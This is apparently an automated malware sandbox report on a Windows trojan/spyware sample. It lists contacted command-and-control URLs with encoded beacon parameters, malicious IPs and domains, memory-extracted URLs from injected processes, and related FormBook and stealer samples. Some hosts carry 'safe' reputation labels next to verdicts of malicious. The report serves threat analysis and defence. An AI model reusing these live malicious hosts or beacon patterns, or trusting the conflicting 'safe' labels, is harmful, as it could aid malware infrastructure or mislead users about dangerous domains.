http://www.odvfr.info/rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA==	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.x3kwqc5tye4vl90y.top/iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw==	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/tw42/	true	Avira URL Cloud: safe	unknown
http://www.valuault.store/nhb9/	true	Avira URL Cloud: safe	unknown
http://www.fersigorta.xyz/2a2y/	true	Avira URL Cloud: safe	unknown
http://www.vh5g.sbs/rjsl/	true	Avira URL Cloud: safe	unknown
http://www.marketyemen.holdings/8efo/	true	Avira URL Cloud: safe	unknown
http://www.lmueller.dev/z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.al-madinatraders.shop/qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.x3kwqc5tye4vl90y.top/iuei/	true	Avira URL Cloud: safe	unknown
http://www.al-madinatraders.shop/qfbg/	true	Avira URL Cloud: safe	unknown
http://www.deacapalla.online/0pui/	true	Avira URL Cloud: safe	unknown
http://www.vh5g.sbs/rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw==	true	Avira URL Cloud: safe	unknown
http://www.valuault.store/nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.axis138ae.shop/j2vs/	true	Avira URL Cloud: safe	unknown
http://www.fersigorta.xyz/2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.f5jh81t3k1w8.sbs/blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw==	true	Avira URL Cloud: malware	unknown
http://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dts.gnpge.com	WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.consentmanager.net	logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCk	logman.exe, 00000005.00000002.4505185726.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000047DC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	logman.exe, 00000005.00000002.4505185726.00000000047B4000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004194000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/29590/bg1.png)	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.al-madinatraders.shop	WnOFOMnqmLQAP.exe, 00000007.00000002.4506381463.00000000055C6000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX6	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/pics/28903/search.png)	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://delivery.consentmanager.net	logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.Deacapalla.online	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSF	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFn	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/js/min.js?v2.3	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.vh5g.sbs/	logman.exe, 00000005.00000002.4505185726.0000000004490000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000003E70000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold	logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	false		high
http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs	WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000044B8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	www.axis138ae.shop	United States	13335	CLOUDFLARENETUS	true
209.74.79.42	www.valuault.store	United States	31744	MULTIBAND-NEWHOPEUS	true
188.114.97.3	www.vh5g.sbs	European Union	13335	CLOUDFLARENETUS	true
93.127.192.201	al-madinatraders.shop	Germany	62255	ASMUNDA-ASSC	true
208.91.197.27	www.deacapalla.online	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
47.254.140.255	www.odvfr.info	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
199.59.243.228	www.marketyemen.holdings	United States	395082	BODIS-NJUS	true
136.243.64.147	100millionjobs.africa	Germany	24940	HETZNER-ASDE	true
134.122.133.80	zcdn.8383dns.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
154.213.39.66	www.f5jh81t3k1w8.sbs	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
46.38.243.234	www.lmueller.dev	Germany	197540	NETCUP-ASnetcupGmbHDE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587671
Start date and time:	2025-01-10 16:40:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NWPZbNcRxL.exe renamed because original name is a hash value
Original Sample Name:	05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@16/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 58 Number of non-executed functions: 270
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:42:09	API Interceptor	10179964x Sleep call for process: logman.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
104.21.48.1	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
209.74.79.42	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	www.glowups.life/o8f4/
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	www.primespot.live/icu6/
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.glowups.life/dheh/
	72STaC6BmljfbIQ.exe	Get hash	malicious	FormBook	Browse	www.primespot.live/b8eq/
188.114.97.3	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/ricr/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
zcdn.8383dns.com	https://199.188.109.181	Get hash	malicious	Unknown	Browse	134.122.133.80
	0Z2lZiPk5K.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	134.122.133.80
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.21.203.24
www.marketyemen.holdings	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
natroredirect.natrocdn.com	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	https://zfrmz.com/3GiGYUP4BArW2NBgkPU3	Get hash	malicious	Unknown	Browse	104.18.94.41
	Play_VM-NowTingrammAudiowav011.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNf	Get hash	malicious	Unknown	Browse	104.17.203.31
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
CLOUDFLARENETUS	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	https://zfrmz.com/3GiGYUP4BArW2NBgkPU3	Get hash	malicious	Unknown	Browse	104.18.94.41
	Play_VM-NowTingrammAudiowav011.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNf	Get hash	malicious	Unknown	Browse	104.17.203.31
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
ASMUNDA-ASSC	biubiu.exe	Get hash	malicious	Unknown	Browse	93.127.198.62
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	93.127.133.167
	copia111224mp.hta	Get hash	malicious	Unknown	Browse	93.127.200.211
	xd.spc.elf	Get hash	malicious	Mirai	Browse	93.127.162.213
	nullnet_load.ppc.elf	Get hash	malicious	Mirai	Browse	91.108.78.211
	Factura-2410-CFDI.bat	Get hash	malicious	Unknown	Browse	93.127.200.211
	JuyR4wj8av.exe	Get hash	malicious	Stealc, Vidar	Browse	93.127.208.30
	EL7ggW7AdA.exe	Get hash	malicious	Stealc, Vidar	Browse	93.127.208.30
